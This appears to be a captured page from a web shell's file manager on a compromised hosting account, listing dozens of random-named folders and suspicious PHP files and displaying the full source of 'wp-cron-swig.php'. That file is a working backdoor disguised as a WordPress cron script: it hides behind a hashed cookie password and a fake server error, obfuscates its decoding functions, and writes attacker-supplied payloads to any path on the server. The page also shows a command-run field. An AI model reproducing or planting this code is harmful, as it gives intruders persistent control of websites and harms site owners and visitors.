/
home
/
suroeste
/
public_html
/
reservas.transportessuroeste.com
/
/home/suroeste/public_html/reservas.transportessuroeste.com
mkdir
upload
Name
Size
Mode
Actions
.well-known/
-
0755
rm
1yloaud/
-
0755
rm
ajftkmz/
-
0755
rm
bjritma/
-
0755
rm
cgaufxy/
-
0755
rm
cmfgazy/
-
0755
rm
djahxzb/
-
0755
rm
eagz1lp/
-
0755
rm
eoahwsk/
-
0755
rm
etadc1x/
-
0755
rm
ewaptru/
-
0755
rm
f1gtyml/
-
0755
rm
fshxdrv/
-
0755
rm
glfnvph/
-
0755
rm
goudjvp/
-
0755
rm
gslfvjk/
-
0755
rm
gzodyhp/
-
0755
rm
hmuleyf/
-
0755
rm
htjebkz/
-
0755
rm
jtbhi1e/
-
0755
rm
jtfgywc/
-
0755
rm
k1cpqbh/
-
0755
rm
kds1txv/
-
0755
rm
koreilh/
-
0755
rm
kyuqnho/
-
0755
rm
ldanqkv/
-
0755
rm
leqdbos/
-
0755
rm
lfaoxpr/
-
0755
rm
lk1mhia/
-
0755
rm
lxbedoj/
-
0755
rm
lzmybas/
-
0755
rm
m1zkuvp/
-
0755
rm
manzksd/
-
0755
rm
mlo1dbe/
-
0755
rm
mrkvsb1/
-
0755
rm
mtcedyw/
-
0755
rm
nuegalp/
-
0755
rm
nwftams/
-
0755
rm
olhfsqm/
-
0755
rm
olwubqc/
-
0755
rm
pqsiudo/
-
0755
rm
qedynox/
-
0755
rm
qv1bxpl/
-
0755
rm
rdvtczh/
-
0755
rm
rqbdvax/
-
0755
rm
tbmjelq/
-
0755
rm
tpewokx/
-
0755
rm
ulspqda/
-
0755
rm
uqeorwg/
-
0755
rm
vunaiph/
-
0755
rm
wemsk1a/
-
0755
rm
wjh1qux/
-
0755
rm
wrobpkl/
-
0755
rm
wurdjfb/
-
0755
rm
xuvyflg/
-
0755
rm
xwudgaz/
-
0755
rm
yjeavui/
-
0755
rm
yopg1ra/
-
0755
rm
yxmhnoz/
-
0755
rm
zxduwp1/
-
0755
rm
zxufosq/
-
0755
rm
.htaccess
199
0644
edit
dl
rm
dyTWS7FYdm.php
11498
0666
edit
dl
rm
php.ini
105
0644
edit
dl
rm
WIQTaZgNfB.php
10676
0666
edit
dl
rm
wp-cron-swig.php
1659
0644
edit
dl
rm
y9rbmY8r9J.php
11498
0666
edit
dl
rm
Edit:
/home/suroeste/public_html/reservas.transportessuroeste.com/wp-cron-swig.php
(1659B)
<?php function endsWith($FullStr, $needle) { $StrLen = strlen($needle); $FullStrEnd = substr($FullStr, strlen($FullStr) - $StrLen); return $FullStrEnd == $needle; } function folder_of_file($p1){ if(!stristr($p1, '/')){ return realpath('./'); } if(strpos($p1, '//') !== false){ $p1 = str_replace('//','/',$p1); } if(endsWith($p1, '/') == true){ $p1 = substr_replace($p1 ,'', -1); } $p2 = ''; $ar = explode('/', $p1); for($i=1; $i < count($ar) - 1; $i++){ $p2 .= '/'.$ar[$i]; } if($p1[0] == '.' && $p1[1] == '/'){ $p2 = './'.$p2; } if($p1[0] == '.' && $p1[1] == '.'){ $p2 = '../'.$p2; } if(strpos($p2, '//') !== false){ $p2 = str_replace('//','/',$p2); } return trim($p2); } function save($path, $source){ $os = strtolower(substr(PHP_OS, 0, 3)); $folder_P = folder_of_file($path); if (!is_writable($folder_P) && $os != "win"){ chmod($folder_P, 0755); } if (file_exists($path) && is_file($path) && !is_writable($path) && $os != "win"){ chmod($path, 0644); } if(function_exists('file_put_contents')){ $saV = file_put_contents($path, $source); }else{ $saV = fwrite(fopen($path, 'w'), $source); } return $saV; } if(!empty($_GET['action'])){ die('Sorry the page you were looking for could not be found.'); } if (md5(md5(md5($_COOKIE['pwd']))) !== '0d4f69bb38f2354a6d896d6a222a4bf5' || empty($_POST['name']) || empty($_POST['age'])){ header('HTTP/1.1 500 Internal Server Error', true, 500); exit(0); } $b = 'ba'.'s'.'e'.'6'.'4_'.'de'.'co'.'de';$srv = 'str'.'rev';$rot = 'str'.'_'.'rot'.'13'; save(trim($_POST['name']), gzuncompress($b($srv($rot(trim($_POST['age'])))))); echo '<html><center>./Done</center></html>'; ?>
Save
cmd:
run